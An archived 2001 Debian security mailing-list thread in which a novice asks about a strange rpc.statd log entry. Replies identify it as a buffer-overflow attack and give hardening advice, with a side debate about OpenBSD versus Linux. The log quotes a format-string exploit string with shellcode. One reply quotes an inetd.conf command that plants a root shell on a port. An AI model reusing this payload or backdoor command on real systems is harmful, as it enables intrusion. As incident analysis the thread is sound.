On Thu, May 24, 2001 at 05:41:08AM -0700, Jacob Meuser wrote: On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? 1.5 years or so yes, i haven't messed with openbsd in a while, i was going to use it for my firewall but there were some problems with it so i ditched in favor of debian. OpenBSD's security reputation is a bit exaggerated, with some good admining a linux box can be just as secure... i was also quite annoyed by its complete lack of upgradability, i tried twice in testing to upgrade the dist from one version to another it failed and made a mess every time, screw that i don't think much of rebuilding a box every 6mo - 1 year just to keep up with the times. Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. heh your almost as cynical as i am ;-) Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. hmm maybe my memory is funky but that seems like more then i saw out of the box... it still had more crap running then i prefer. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. its a nice system, i like the simplicity and clean design, its like debian in that. but upgrading the whole thing is simply impossible. well maybe grabbing all source from CVS and doing make world will do it, but i didn't try it. the `official' upgrade system is broken. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? well openbsd claims to have audited everything they enable by default, and everything in their base install (which is VERY lean). from reading bugtraq they seem to have a very bad habit about fixing bugs quietly and not bothering to send patches upstream, instead posting sarcastic messages along the lines of `oh yeah we fixed that in CVS 3 years ago' (check out the recent joe DEADJOE vulnerabity for an example). of course i could be wrong, and all upstream developers are just blackholing openbsd security patches. -- Ethan Benson http://www.alaska.net/~erbenson/ pgpXWJGVW21UQ.pgp Description: PGP signature
Re: strange log entry
On Thu, 24 May 2001 [EMAIL PROTECTED] wrote: What you have there is someone trying to do a buffer overflow attack on rpc.statd. The idea is that once the buffer is blown, they will get a chance to issue a command as root. In the attack that was attempted on on of the systems I was given to supervise the last part of the garbage sent to the buffer was: /bin/sh -c echo 9704 stream tcp nowait root /bin/sh sh -i /etc/inetd.conf;killall -HUP inetd This, if it had succeeded, would have created a new line in inetd.conf and restarted inetd. Then they would have come in on port 9704 to a nice root shell and did what ever they wanted to do probably remove that line, edit my logs, install a root kit, and leave as quietly as possible. Luckily this time it didn't work and left some dirty footprints as evidence. As stated earlier the best way to deal with this, if you don't need rpc services running for NFS/NIS or something similar is to just shut portmapper and all the other RPC services down and remove them from your start up scripts. I was curios however, so I just made sure tcp wrapper -tcpd - covered portmapper and added portmap: ALL to my /etc/hosts.deny file so I could gather some IP numbers via TCPD logging. Figure I should let the networks assigned the IPs know that some of their machines are compromised/being used for cracking. While setting up a firewall as others have previously suggested is a dang good idea, don't forget to use tcp wrappers also, if for only the logging. For the security conscious, or the inexperienced a good first step right after first booting a machine is to type su -c echo ALL:ALL /etc/hosts.deny root . I'd do that before even connecting to the network. Later if you must you can relax it a bit, but its a good place to start. Howerver, now that you have seen this one attack, you should probably go over your logs and system accounting files with a fine tooth comb and see if anyone else might have succeeded before or after ;) This is a far from exhaustive list but try: looking for any breaks in your log files or unexpected daemon restarts. examine your crontabs to see if there are any jobs you didn't put there. check your /etc/passwd file for any unrecognized users or strange shells. check inetd.conf for any odd entries. run a find / -m x to look for new or edited files. see if there are any there that you don't remember editing. Look for changed permissions too. download at root kit detector and see if anyone has already left you a present. again this is just the start ;) I apologize to folks who consider this all old-news, but trevs was brave enough to admit he didn't know, so there are probably a few others lurking in the same boat ;) Good luck! David. Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 01:34:01AM -0700, Jacob Meuser wrote: OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? This is not the same stuff at all. They ship with rstatd turned on, not rpc.statd. They are completely different. rpc.statd is used by nfs. rstatd is used by the rstat program, which tells you info about machines on your network. It is like running 'uptime' on all your machines at once. noah -- ___ | Web: http://web.morgul.net/~frodo/ | PGP Public Key: http://web.morgul.net/~frodo/mail.html pgpL7aF0GbSea.pgp Description: PGP signature
RE: strange log entry
Hello, the same can be said with nfs and coda/samba (windows filesharing)they are both easily exploitable codes simply by the way they operate. Basicaly in a nutshell the code assume to much which makes it easily exploitable. Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 4:34 AM To: debian-security@lists.debian.org Subject: Re: strange log entry On Thu, May 24, 2001 at 01:24:50AM -0400, Ed Street wrote: Hello, Well first off WHY are you running the rpc stuff? (i.e. I can root a redhat 6.x box in under 30 seconds with a rpc exploit from a clean install) Turn that stuff OFF. Not to start a thread discussing OSes, but ... OpenBSD ships with rstatd and ruserd enabled by default and according to http://www.openbsd.org/ Four years without a remote hole in the default install! Which begs the question, especially since the *BSD's release their sources under BSD style liscenses, why does rpc remain a security problem in Linux? Is it the kernel? Is it the rpc code? Simply curious, [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
RE: strange log entry
Hello, that's simple ;) If they was stable/non-exploitable then we'd be using rpc inplace of ssh ;) Ed -Original Message- From: Jacob Meuser [mailto:[EMAIL PROTECTED] Sent: Thursday, May 24, 2001 8:41 AM To: debian-security@lists.debian.org Subject: Re: strange log entry On Thu, May 24, 2001 at 04:06:08AM -0800, Ethan Benson wrote: On Thu, May 24, 2001 at 04:50:57AM -0700, Jacob Meuser wrote: BS, when was the last time you installed OpenBSD? I just did an install 2.5 That was what, 2 years ago? today. I guarantee portmap, ruserd, and rstatd are enabled by default, as the installer doesn't even ask what you want to activate, and these programs are part of the base tarball. in 2.5 ftpd, portmap, smtp, and identd were open, i am pretty sure rstatd was not. 2.6 i think disabled ftpd by default, shortly thereafter a root hole was found in openbsd's ftpd and they prompty said `ftpd is not enabled in the default install of 2.6 (or whatever) and thus there is no root hole in our default install' Ah, they probably caught the problem shortly before 2.6 release, and didn't have time to fix ftp code, but changing rc.conf was doable. Anyway, as of 2.9, portmap, rstatd, ruserd, time, daytime, comsat, sshd and identd are enabled by default. Like I said, I didn't want to start a discussion about OpenBSD vs Linux, I have seen posts from you saying that you like some features of OpenBSD, /sbin/nologin for example. I'm just curious why the 'r' tools are apparently so vulnerable in Linux. If the OpenBSD folks are willing to risk creditability by claiming that their default install has no remote holes, while enabling portmap and rstatd by default, why can't Linux users feel safe running those daemons also? [EMAIL PROTECTED] -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Re: strange log entry
On Thu, May 24, 2001 at 07:33:44AM +, Jim Breton wrote: On Thu, May 24, 2001 at 04:10:13PM +0900, Curt Howland wrote: the last two i understand, as well as domain, but sunrpc and 1171? man fuser. Look for the -n option. ... or look for -p option of netstat :) Mirek
strange log entry
Heya :) I was running a 'tail -f' on my /var/log/messages and this entry appeared while I was connected to the internet: May 24 10:08:11 noogies -- MARK -- May 24 10:20:34 noogies May 24 10:20:34 noogies /sbin/rpc.statd[151]: gethostbyname error for ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220 May 24 10:20:34 noogies Ç^F/binÇF^D/shA0À\210F^G\211v^L\215V^P\215N^L\211ó°^KÍ\200°^AÍ\200è\177ÿÿÿ and it has me worried it may be a security issue. I'm very new to linux, and newer again to debian, and at this stage I really don't have a clue as to what the above log entry is trying to tell me... Any input or comments would be very appreciated :) Thank you - trevs -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
